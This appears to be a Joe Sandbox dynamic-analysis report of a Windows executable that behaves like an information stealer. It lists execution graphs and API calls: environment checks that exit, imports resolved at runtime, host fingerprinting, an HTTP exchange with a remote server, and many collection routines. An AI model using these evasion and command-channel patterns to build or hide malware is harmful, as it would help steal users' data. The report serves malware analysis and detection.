                            execution_graph 37700 f46c90 37745 f322a0 37700->37745 37724 f46d04 37725 f4acc0 4 API calls 37724->37725 37726 f46d0b 37725->37726 37727 f4acc0 4 API calls 37726->37727 37728 f46d12 37727->37728 37729 f4acc0 4 API calls 37728->37729 37730 f46d19 37729->37730 37731 f4acc0 4 API calls 37730->37731 37732 f46d20 37731->37732 37897 f4abb0 37732->37897 37734 f46dac 37901 f46bc0 GetSystemTime 37734->37901 37736 f46d29 37736->37734 37738 f46d62 OpenEventA 37736->37738 37739 f46d95 CloseHandle Sleep 37738->37739 37740 f46d79 37738->37740 37742 f46daa 37739->37742 37744 f46d81 CreateEventA 37740->37744 37742->37736 37743 f46db6 CloseHandle ExitProcess 37744->37734 38098 f34610 37745->38098 37747 f322b4 37748 f34610 2 API calls 37747->37748 37749 f322cd 37748->37749 37750 f34610 2 API calls 37749->37750 37751 f322e6 37750->37751 37752 f34610 2 API calls 37751->37752 37753 f322ff 37752->37753 37754 f34610 2 API calls 37753->37754 37755 f32318 37754->37755 37756 f34610 2 API calls 37755->37756 37757 f32331 37756->37757 37758 f34610 2 API calls 37757->37758 37759 f3234a 37758->37759 37760 f34610 2 API calls 37759->37760 37761 f32363 37760->37761 37762 f34610 2 API calls 37761->37762 37763 f3237c 37762->37763 37764 f34610 2 API calls 37763->37764 37765 f32395 37764->37765 37766 f34610 2 API calls 37765->37766 37767 f323ae 37766->37767 37768 f34610 2 API calls 37767->37768 37769 f323c7 37768->37769 37770 f34610 2 API calls 37769->37770 37771 f323e0 37770->37771 37772 f34610 2 API calls 37771->37772 37773 f323f9 37772->37773 37774 f34610 2 API calls 37773->37774 37775 f32412 37774->37775 37776 f34610 2 API calls 37775->37776 37777 f3242b 37776->37777 37778 f34610 2 API calls 37777->37778 37779 f32444 37778->37779 37780 f34610 2 API calls 37779->37780 37781 f3245d 37780->37781 37782 f34610 2 API calls 37781->37782 37783 f32476 37782->37783 37784 f34610 2 API calls 37783->37784 37785 f3248f 37784->37785 37786 f34610 2 API calls 37785->37786 37787 f324a8 
37786->37787 37788 f34610 2 API calls 37787->37788 37789 f324c1 37788->37789 37790 f34610 2 API calls 37789->37790 37791 f324da 37790->37791 37792 f34610 2 API calls 37791->37792 37793 f324f3 37792->37793 37794 f34610 2 API calls 37793->37794 37795 f3250c 37794->37795 37796 f34610 2 API calls 37795->37796 37797 f32525 37796->37797 37798 f34610 2 API calls 37797->37798 37799 f3253e 37798->37799 37800 f34610 2 API calls 37799->37800 37801 f32557 37800->37801 37802 f34610 2 API calls 37801->37802 37803 f32570 37802->37803 37804 f34610 2 API calls 37803->37804 37805 f32589 37804->37805 37806 f34610 2 API calls 37805->37806 37807 f325a2 37806->37807 37808 f34610 2 API calls 37807->37808 37809 f325bb 37808->37809 37810 f34610 2 API calls 37809->37810 37811 f325d4 37810->37811 37812 f34610 2 API calls 37811->37812 37813 f325ed 37812->37813 37814 f34610 2 API calls 37813->37814 37815 f32606 37814->37815 37816 f34610 2 API calls 37815->37816 37817 f3261f 37816->37817 37818 f34610 2 API calls 37817->37818 37819 f32638 37818->37819 37820 f34610 2 API calls 37819->37820 37821 f32651 37820->37821 37822 f34610 2 API calls 37821->37822 37823 f3266a 37822->37823 37824 f34610 2 API calls 37823->37824 37825 f32683 37824->37825 37826 f34610 2 API calls 37825->37826 37827 f3269c 37826->37827 37828 f34610 2 API calls 37827->37828 37829 f326b5 37828->37829 37830 f34610 2 API calls 37829->37830 37831 f326ce 37830->37831 37832 f49bb0 37831->37832 38103 f49aa0 GetPEB 37832->38103 37834 f49bb8 37835 f49de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37834->37835 37836 f49bca 37834->37836 37837 f49e44 GetProcAddress 37835->37837 37838 f49e5d 37835->37838 37841 f49bdc 21 API calls 37836->37841 37837->37838 37839 f49e96 37838->37839 37840 f49e66 GetProcAddress GetProcAddress 37838->37840 37842 f49e9f GetProcAddress 37839->37842 37843 f49eb8 37839->37843 37840->37839 37841->37835 37842->37843 37844 f49ec1 GetProcAddress 37843->37844 37845 f49ed9 37843->37845 37844->37845 
Execution Graph

[The interactive execution graph was flattened by extraction into a node/edge dump (node id, function address, API names, a->b edges). Only the API sequence recoverable from that dump is kept here; node ids and edge lists are omitted.]

f311d0 -> f31160 / f31110 / f310a0 / f48b40: GetSystemInfo, GetCurrentProcess + VirtualAllocExNuma, VirtualAlloc / VirtualFree, GlobalMemoryStatusEx; each of these checks has a branch to ExitProcess.
f46a10: GetUserDefaultLangID, followed by five separate ExitProcess branches.
f479e0 / f47a70: GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA.
f46c38: sscanf, two SystemTimeToFileTime calls, then a branch to ExitProcess.
f326f0: a straight-line run of over 300 calls to f34610 (RtlAllocateHeap, VirtualProtect), then f49f20, which resolves imports through long runs of GetProcAddress.
f47690: GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA.
f348d0: InternetCrackUrlA (f34800), lstrcpy/lstrcat request assembly, GetSystemTime (f48cf0), InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, an InternetReadFile loop, InternetCloseHandle; the response is passed through CryptStringToBinaryA with LocalAlloc / LocalFree (f3a210).
f419f0: a chain of ten StrCmpCA comparisons over the response, the first of which branches to ExitProcess.
f45d60 / f45760: repeated StrCmpCA comparisons, Sleep, and dispatch into the collection routines f41c60 (115 API calls), f408a0 (288), f37770 (108), f449d0 (88), f44010 (67), f44fc0 (65), f45190 (63), f452a0 (61), f44e00 (61), f31ec0 (59), f44300 (58), f491a0 (46), f45350 (45), f437b0 (31), f45510 (25), f45440 (20), f41520 (19), f468d0 (9), f35000 (7), with f359b0 (34 API calls) called ahead of several of them.
String helpers f4aa50, f4aab0, f4abb0, f4ab30, f4ac30, f4acc0, f31590 / f316b0: lstrcpy, lstrcat, lstrlen.

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 f49bb0-f49bc4 call f49aa0 663 f49de3-f49e42 LoadLibraryA * 5 660->663 664 f49bca-f49dde call f49ad0 GetProcAddress * 21 660->664 666 f49e44-f49e58 GetProcAddress 663->666 667 f49e5d-f49e64 663->667 664->663 666->667 668 f49e96-f49e9d 667->668 669 f49e66-f49e91 GetProcAddress * 2 667->669 671 f49e9f-f49eb3 GetProcAddress 668->671 672 f49eb8-f49ebf 668->672 669->668 671->672 673 f49ec1-f49ed4 GetProcAddress 672->673 674 f49ed9-f49ee0 672->674 673->674 675 f49f11-f49f12 674->675 676 f49ee2-f49f0c GetProcAddress * 2 674->676 676->675
                            APIs
                            • GetProcAddress.KERNEL32(75900000,00980648), ref: 00F49BF1
                            • GetProcAddress.KERNEL32(75900000,009807F8), ref: 00F49C0A
                            • GetProcAddress.KERNEL32(75900000,009806D8), ref: 00F49C22
                            • GetProcAddress.KERNEL32(75900000,009806F0), ref: 00F49C3A
                            • GetProcAddress.KERNEL32(75900000,00980708), ref: 00F49C53
                            • GetProcAddress.KERNEL32(75900000,00988AF0), ref: 00F49C6B
                            • GetProcAddress.KERNEL32(75900000,00976700), ref: 00F49C83
                            • GetProcAddress.KERNEL32(75900000,00976A20), ref: 00F49C9C
                            • GetProcAddress.KERNEL32(75900000,00980738), ref: 00F49CB4
                            • GetProcAddress.KERNEL32(75900000,00980750), ref: 00F49CCC
                            • GetProcAddress.KERNEL32(75900000,00980768), ref: 00F49CE5
                            • GetProcAddress.KERNEL32(75900000,009807B0), ref: 00F49CFD
                            • GetProcAddress.KERNEL32(75900000,009766A0), ref: 00F49D15
                            • GetProcAddress.KERNEL32(75900000,00980780), ref: 00F49D2E
                            • GetProcAddress.KERNEL32(75900000,009807C8), ref: 00F49D46
                            • GetProcAddress.KERNEL32(75900000,00976800), ref: 00F49D5E
                            • GetProcAddress.KERNEL32(75900000,009807E0), ref: 00F49D77
                            • GetProcAddress.KERNEL32(75900000,009808B8), ref: 00F49D8F
                            • GetProcAddress.KERNEL32(75900000,00976840), ref: 00F49DA7
                            • GetProcAddress.KERNEL32(75900000,00980858), ref: 00F49DC0
                            • GetProcAddress.KERNEL32(75900000,009769C0), ref: 00F49DD8
                            • LoadLibraryA.KERNEL32(00980870,?,00F46CA0), ref: 00F49DEA
                            • LoadLibraryA.KERNEL32(00980900,?,00F46CA0), ref: 00F49DFB
                            • LoadLibraryA.KERNEL32(00980888,?,00F46CA0), ref: 00F49E0D
                            • LoadLibraryA.KERNEL32(009808A0,?,00F46CA0), ref: 00F49E1F
                            • LoadLibraryA.KERNEL32(009808D0,?,00F46CA0), ref: 00F49E30
                            • GetProcAddress.KERNEL32(75070000,009808E8), ref: 00F49E52
                            • GetProcAddress.KERNEL32(75FD0000,00980918), ref: 00F49E73
                            • GetProcAddress.KERNEL32(75FD0000,00988C40), ref: 00F49E8B
                            • GetProcAddress.KERNEL32(75A50000,00988E50), ref: 00F49EAD
                            • GetProcAddress.KERNEL32(74E50000,00976740), ref: 00F49ECE
                            • GetProcAddress.KERNEL32(76E80000,00988A10), ref: 00F49EEF
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00F49F06
                            Strings
                            • NtQueryInformationProcess, xrefs: 00F49EFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: a018fe7c8dc0800087565df1433bc287b91a1c28dc23732d37ccd0aa4d7743cc
                            • Instruction ID: 8869300c51c8ee5000026e5253f20a311bb247801708e252a466b6ee00de775b
                            • Opcode Fuzzy Hash: a018fe7c8dc0800087565df1433bc287b91a1c28dc23732d37ccd0aa4d7743cc
                            • Instruction Fuzzy Hash: 64A12EB56042009FC366DFA8F88C956BBBAB74D701710871AB989C329ED774B950DFB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 f34610-f346e5 RtlAllocateHeap 781 f346f0-f346f6 764->781 782 f3479f-f347f9 VirtualProtect 781->782 783 f346fc-f3479a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F3465F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F347EC
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347C0
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346FC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34712
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34688
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34707
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3478F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34672
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346B2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34728
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346D3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347B5
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346BD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34779
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3476E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347CB
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34693
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346C8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F346A7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34763
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34784
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3467D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3479F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F3471D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F347AA
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F34667
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (one sentence, repeated and '$'-separated in the report for every reference listed under Strings; collapsed here)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 6c7baed75053fd94767680c67755f53ed18215812021eba4132813a669178e64
                            • Instruction ID: ed0a18a236f0dfb77fbfcd517677def1f8e19c76796379c197e62c45ede79e85
                            • Opcode Fuzzy Hash: 6c7baed75053fd94767680c67755f53ed18215812021eba4132813a669178e64
                            • Instruction Fuzzy Hash: 184148616D26147EE634FBA48872F9F76625F42F8BF407044EE22762C2CB70B60855A3

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 f362d0-f3635b call f4aab0 call f34800 call f4aa50 InternetOpenA StrCmpCA 1040 f36364-f36368 1033->1040 1041 f3635d 1033->1041 1042 f36559-f36575 call f4aab0 call f4ab10 * 2 1040->1042 1043 f3636e-f36392 InternetConnectA 1040->1043 1041->1040 1061 f36578-f3657d 1042->1061 1044 f36398-f3639c 1043->1044 1045 f3654f-f36553 InternetCloseHandle 1043->1045 1048 f363aa 1044->1048 1049 f3639e-f363a8 1044->1049 1045->1042 1051 f363b4-f363e2 HttpOpenRequestA 1048->1051 1049->1051 1053 f36545-f36549 InternetCloseHandle 1051->1053 1054 f363e8-f363ec 1051->1054 1053->1045 1056 f36415-f36455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 f363ee-f3640f InternetSetOptionA 1054->1057 1059 f36457-f36477 call f4aa50 call f4ab10 * 2 1056->1059 1060 f3647c-f3649b call f48ad0 1056->1060 1057->1056 1059->1061 1067 f36519-f36539 call f4aa50 call f4ab10 * 2 1060->1067 1068 f3649d-f364a4 1060->1068 1067->1061 1071 f36517-f3653f InternetCloseHandle 1068->1071 1072 f364a6-f364d0 InternetReadFile 1068->1072 1071->1053 1076 f364d2-f364d9 1072->1076 1077 f364db 1072->1077 1076->1077 1080 f364dd-f36515 call f4acc0 call f4abb0 call f4ab10 1076->1080 1077->1071 1080->1072
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • InternetOpenA.WININET(00F50DFF,00000001,00000000,00000000,00000000), ref: 00F36331
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36353
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F36385
                            • HttpOpenRequestA.WININET(00000000,GET,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F363D5
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F3640F
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F36421
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F3644D
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F364BD
                            • InternetCloseHandle.WININET(00000000), ref: 00F3653F
                            • InternetCloseHandle.WININET(00000000), ref: 00F36549
                            • InternetCloseHandle.WININET(00000000), ref: 00F36553
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: 0a01ce5dc7c7f126b2f45038da67804afbb4e6f66aa39a1b55667eb9652595de
                            • Instruction ID: 611c7c759bf60a8cb9f9ca28db330cf3b92ccab168c8ce1a3d1568890cff0229
                            • Opcode Fuzzy Hash: 0a01ce5dc7c7f126b2f45038da67804afbb4e6f66aa39a1b55667eb9652595de
                            • Instruction Fuzzy Hash: 03717D71A40218EBEB24DFA0DC59BEEB775FB44310F108198F60AAB1C5DBB46A84DF51

                            Control-flow Graph (legend in the rendered graph: Executed / Not Executed; listed here as basic block, its API calls and its successor blocks)

                            • 1356 f47690-f476da: GetWindowsDirectoryA -> 1357, 1358
                            • 1357 f476e3-f47757: GetVolumeInformationA, call f48e90 * 3 -> 1365
                            • 1358 f476dc -> 1357
                            • 1365 f47768-f4776f -> 1366, 1367
                            • 1366 f47771-f4778a: call f48e90 -> 1365
                            • 1367 f4778c-f477a7: GetProcessHeap, RtlAllocateHeap -> 1369, 1370
                            • 1369 f477b8-f477e8: wsprintfA, call f4aa50 -> 1377
                            • 1370 f477a9-f477b6: call f4aa50 -> 1377
                            • 1377 f4780e-f4781e
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F476D2
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F4770F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F47793
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F4779A
                            • wsprintfA.USER32 ref: 00F477D0
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 9ded72c9eb1ee7a79cb10bba3cf598539b49bb929bc93ae07559e156e3467a7a
                            • Instruction ID: e692117f7733c90d4ccdff6c8d48eb4235bc04333216119cf64678d7618c6924
                            • Opcode Fuzzy Hash: 9ded72c9eb1ee7a79cb10bba3cf598539b49bb929bc93ae07559e156e3467a7a
                            • Instruction Fuzzy Hash: D841B6B1D04348DBDF11EF94DC45BDEBBB8AF08714F104199FA09AB281D7786A44CBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F311B7), ref: 00F47A10
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47A17
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F47A2F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
